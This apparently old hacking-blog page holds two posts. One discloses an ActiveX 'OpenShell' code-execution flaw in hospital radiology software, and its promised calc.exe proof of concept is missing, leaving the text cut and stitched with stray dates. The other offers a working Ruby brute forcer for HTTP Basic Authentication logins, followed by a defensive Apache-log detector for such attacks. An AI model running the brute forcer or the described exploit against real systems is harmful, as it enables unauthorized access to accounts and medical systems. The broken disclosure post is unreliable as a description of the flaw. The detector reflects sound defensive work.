Hi everyone again!!
I'd like to report an undisclosed vulnerability I found in a very commonly used Radiology Software during a pentest in a Hospital.
Technical details:
To work properly the application installs a cab file called prjkillhome.cab containing our ActiveX control.
Using ComRaider we can see that this control uses a potentially noxious function called OpenShell.
By creating an HTML document that invokes it, it's been possible to exploit it to run arbitrary code on the victim machine.
Following is a PoC that spawns calc.exe
Tuesday, July 14, 2009
Friday, July 3, 2009
Ruby Brute Forcer for Basic Authentication
Hi everyone, since I've just started coding in Ruby, I'd like to give the Hacking community a small contribution.
Here's a Ruby script that, given two files, attempts to brute force basic authentication logins, like those of Lotus Notes or Apache.

```ruby
#!/bin/ruby
require 'net/http'
require 'timeout'

puts "Basic Auth Bruteforcer"
puts "----------------------------"
puts "Usage: #{File.basename($0)} url uri"

# Both the host (url) and the path (uri) are required.
if ARGV.length < 2
  $stderr.puts("Usage: #{File.basename($0)} url uri")
  exit
end

url = "#{ARGV[0]}"
p url
uri = "#{ARGV[1]}"
p uri

# Candidate lists are read from two files in the working directory.
username = IO.readlines("user.txt")
password = IO.readlines("password.txt")
resp = href = ""

begin
  http = Net::HTTP.new(url, 80)
  #http.use_ssl = true
  username.each do |user|
    password.each do |pass|
      p "trying #{user.chomp} with password #{pass.chomp}"
      Timeout::timeout(3) do
        http.start do |conn|
          req = Net::HTTP::Get.new(uri, {"User-Agent" => "wget"})
          req.basic_auth(user.chomp, pass.chomp)
          response = conn.request(req)
          case response
          when Net::HTTPOK
            p resp = response.body
          when Net::HTTPUnauthorized
            p 'Unauthorized'
          else
            p 'error'
          end
        end
      end
    end
  end
rescue Timeout::Error
  # Must come before the bare rescue, which would otherwise catch it first.
  p "Problem Connecting"
rescue
  # Interpolate the exception; String + Exception raises TypeError.
  $stderr.print "Connection Failed: #{$!}\n"
end
```
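On the defensive side, a run of a script like this shows up in the web server's access log as a burst of 401 responses from one client against one path. The detector below is an added example, not part of the original post; it assumes Apache combined log format, and the function name, thresholds and sample log lines are constructed for illustration.

```ruby
require 'time'

# Apache combined log: host ident user [time] "method path proto" status bytes ...
LOG_RE = /\A(\S+) \S+ (\S+) \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) \S+/

# Constructed sample: one client guessing credentials, one normal browser login.
SAMPLE = <<~LOG.lines
  192.0.2.10 - admin [14/Jul/2009:10:00:01 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "wget"
  192.0.2.10 - admin [14/Jul/2009:10:00:02 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "wget"
  192.0.2.10 - admin [14/Jul/2009:10:00:03 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "wget"
  192.0.2.10 - backup [14/Jul/2009:10:00:04 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "wget"
  192.0.2.10 - backup [14/Jul/2009:10:00:05 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "wget"
  192.0.2.10 - backup [14/Jul/2009:10:00:06 +0000] "GET /protected/ HTTP/1.1" 200 5120 "-" "wget"
  198.51.100.7 - - [14/Jul/2009:10:05:00 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
  198.51.100.7 - alice [14/Jul/2009:10:05:04 +0000] "GET /protected/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG

# Returns one finding per (client, path) that has at least `threshold` 401
# responses inside any `window`-second span. Apache records the supplied user
# name even on a 401, so those names are attempted accounts, not logins.
def detect_basic_auth_bruteforce(lines, threshold: 5, window: 60)
  events = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    m = LOG_RE.match(line) or next
    ts = Time.strptime(m[3], '%d/%b/%Y:%H:%M:%S %z')
    events[[m[1], m[4]]] << { user: m[2], time: ts, status: m[5].to_i }
  end

  events.filter_map do |(client, path), evs|
    evs.sort_by! { |e| e[:time] }
    failures = evs.select { |e| e[:status] == 401 }
    burst = failures.each_index.any? do |i|
      j = i + threshold - 1
      j < failures.size && failures[j][:time] - failures[i][:time] <= window
    end
    next unless burst
    # First authenticated 200 after the guessing started: likely guessed account.
    hit = evs.find { |e| e[:status] == 200 && e[:user] != '-' && e[:time] >= failures.first[:time] }
    { client: client, path: path, failures: failures.size,
      users_tried: failures.map { |e| e[:user] }.uniq - ['-'],
      compromised: hit && hit[:user] }
  end
end

detect_basic_auth_bruteforce(SAMPLE).each { |f| puts f.inspect } if __FILE__ == $0
```

The detection keys on the 401 rate rather than the `wget` User-Agent, since that header is set by the client and cannot be relied on.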